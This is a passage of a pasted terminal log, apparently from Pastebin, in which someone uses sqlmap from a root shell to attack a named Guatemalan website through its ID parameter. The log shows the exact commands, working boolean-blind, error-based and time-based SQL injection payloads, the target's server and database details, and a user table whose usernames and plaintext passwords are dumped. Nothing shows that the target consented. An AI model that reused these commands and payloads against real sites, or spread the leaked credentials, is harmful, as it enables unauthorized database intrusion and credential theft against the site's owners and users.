  547. [01:26:26] [INFO] retrieved: strDireccion
  548. [01:26:27] [INFO] retrieved: varchar(255)
  549. [01:26:27] [INFO] retrieved: strTel
  550. [01:26:27] [INFO] retrieved: varchar(14)
  551. [01:26:28] [INFO] retrieved: strfax
  552. [01:26:28] [INFO] retrieved: varchar(14)
  553. [01:26:29] [INFO] retrieved: strEmail
  554. [01:26:29] [INFO] retrieved: varchar(128)
  555. Database: dbusuarios
  556. Table: tbl_user_mspasgobgt
  557. [11 columns]
  558. +--------------+---------------+
  559. | Column | Type |
  560. +--------------+---------------+
  561. | ID_USER | mediumint(11) |
  562. | strApellido | varchar(64) |
  563. | strCodigo | varchar(64) |
  564. | strDireccion | varchar(255) |
  565. | strEmail | varchar(128) |
  566. | strfax | varchar(14) |
  567. | strNombre | varchar(64) |
  568. | strPassword | varchar(32) |
  569. | strTel | varchar(14) |
  570. | strUser | varchar(64) |
  571. | strUserCateg | varchar(255) |
  572. +--------------+---------------+
  573.  
  574. [01:26:30] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.catedral.org.gt'
  575.  
  576. [*] shutting down at 01:26:29
  577.  
  578. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios -T tbl_user_mspasgobgt -C strUser --dump
  579.  
  580. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  581. http://sqlmap.org
  582.  
  583. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  584.  
  585. [*] starting at 01:31:36
  586.  
  587. [01:31:36] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
  588. [01:31:37] [INFO] resuming back-end DBMS 'mysql'
  589. [01:31:37] [INFO] testing connection to the target url
  590. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  591. ---
  592. Place: GET
  593. Parameter: ID
  594. Type: boolean-based blind
  595. Title: AND boolean-based blind - WHERE or HAVING clause
  596. Payload: ID=4233 AND 7933=7933
  597.  
  598. Type: error-based
  599. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  600. Payload: ID=4233 AND (SELECT 6237 FROM(SELECT COUNT(*),CONCAT(0x3a6363733a,(SELECT (CASE WHEN (6237=6237) THEN 1 ELSE 0 END)),0x3a78756e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  601.  
  602. Type: AND/OR time-based blind
  603. Title: MySQL > 5.0.11 AND time-based blind
  604. Payload: ID=4233 AND SLEEP(5)
  605. ---
  606.  
  607. [01:31:38] [INFO] the back-end DBMS is MySQL
  608. web server operating system: Linux Fedora 15 (Lovelock)
  609. web application technology: PHP 5.3.6, Apache 2.2.17
  610. back-end DBMS: MySQL 5.0
  611. do you want sqlmap to consider provided column(s):
  612. [1] as LIKE column names (default)
  613. [2] as exact column names
  614. > 2
  615.  
  616. [01:31:41] [INFO] fetching columns 'strUser' for table 'tbl_user_mspasgobgt' in database 'dbusuarios'
  617. [01:31:42] [INFO] the SQL query used returns 1 entries
  618. [01:31:43] [INFO] retrieved: strUser
  619. [01:31:43] [INFO] retrieved: varchar(64)
  620. [01:31:43] [INFO] fetching entries of column(s) 'strUser' for table 'tbl_user_mspasgobgt' in database 'dbusuarios'
  621. [01:31:43] [INFO] the SQL query used returns 2 entries
  622. [01:31:44] [INFO] retrieved: anion
  623. [01:31:44] [INFO] retrieved: ANONYMOUS
  624. [01:31:44] [INFO] analyzing table dump for possible password hashes
  625. Database: dbusuarios
  626. Table: tbl_user_mspasgobgt
  627. [2 entries]
  628. +-----------+
  629. | strUser |
  630. +-----------+
  631. | anion |
  632. | ANONYMOUS |
  633. +-----------+
  634.  
  635. [01:31:45] [INFO] table 'dbusuarios.tbl_user_mspasgobgt' dumped to CSV file '/pentest/database/sqlmap/output/www.catedral.org.gt/dump/dbusuarios/tbl_user_mspasgobgt.csv'
  636. [01:31:45] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.catedral.org.gt'
  637.  
  638. [*] shutting down at 01:31:45
  639.  
  640. root@bt:/pentest/database/sqlmap# /sqlmap.py -u http://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios -T tbl_user_mspasgobgt -C strPassword --dump
  641. bash: /sqlmap.py: No such file or directory
  642. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios -T tbl_user_mspasgobgt -C strPassword --dump
  643.  
  644. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  645. http://sqlmap.org
  646.  
  647. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  648.  
  649. [*] starting at 01:39:07
  650.  
  651. [01:39:07] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0
  652. [00:39:07] [INFO] resuming back-end DBMS 'mysql'
  653. [00:39:18] [INFO] testing connection to the target url
  654. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  655. ---
  656. Place: GET
  657. Parameter: ID
  658. Type: boolean-based blind
  659. Title: AND boolean-based blind - WHERE or HAVING clause
  660. Payload: ID=4233 AND 7933=7933
  661.  
  662. Type: error-based
  663. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  664. Payload: ID=4233 AND (SELECT 6237 FROM(SELECT COUNT(*),CONCAT(0x3a6363733a,(SELECT (CASE WHEN (6237=6237) THEN 1 ELSE 0 END)),0x3a78756e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  665.  
  666. Type: AND/OR time-based blind
  667. Title: MySQL > 5.0.11 AND time-based blind
  668. Payload: ID=4233 AND SLEEP(5)
  669. ---
  670.  
  671. [01:39:19] [INFO] the back-end DBMS is MySQL
  672. web server operating system: Linux Fedora 15 (Lovelock)
  673. web application technology: PHP 5.3.6, Apache 2.2.17
  674. back-end DBMS: MySQL 5.0
  675. do you want sqlmap to consider provided column(s):
  676. [1] as LIKE column names (default)
  677. [2] as exact column names
  678. > 2
  679.  
  680. [01:39:23] [INFO] fetching columns 'strPassword' for table 'tbl_user_mspasgobgt' in database 'dbusuarios'
  681. [01:39:23] [INFO] the SQL query used returns 1 entries
  682. [01:39:26] [INFO] retrieved: strPassword
  683. [01:39:26] [INFO] retrieved: varchar(32)
  684. [01:39:26] [INFO] fetching entries of column(s) 'strPassword' for table 'tbl_user_mspasgobgt' in database 'dbusuarios'
  685. [01:39:26] [INFO] the SQL query used returns 2 entries
  686. [01:39:27] [INFO] retrieved: aniongt
  687. [01:39:27] [INFO] retrieved: LOLLOL
  688. [01:39:28] [INFO] analyzing table dump for possible password hashes
  689. Database: dbusuarios
  690. Table: tbl_user_mspasgobgt
  691. [2 entries]
  692. +-------------+
  693. | strPassword |
  694. +-------------+
  695. | aniongt |
  696. | LOLLOL |
  697. +-------------+
  698.  
  699. [01:39:28] [INFO] table 'dbusuarios.tbl_user_mspasgobgt' dumped to CSV file '/pentest/database/sqlmap/output/www.catedral.org.gt/dump/dbusuarios/tbl_user_mspasgobgt.csv'
  700. [01:39:28] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.catedral.org.gt'
  701.  
  702. [*] shutting down at 01:39:28
  703.  
  704. root@bt:/pentest/database/sqlmap#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!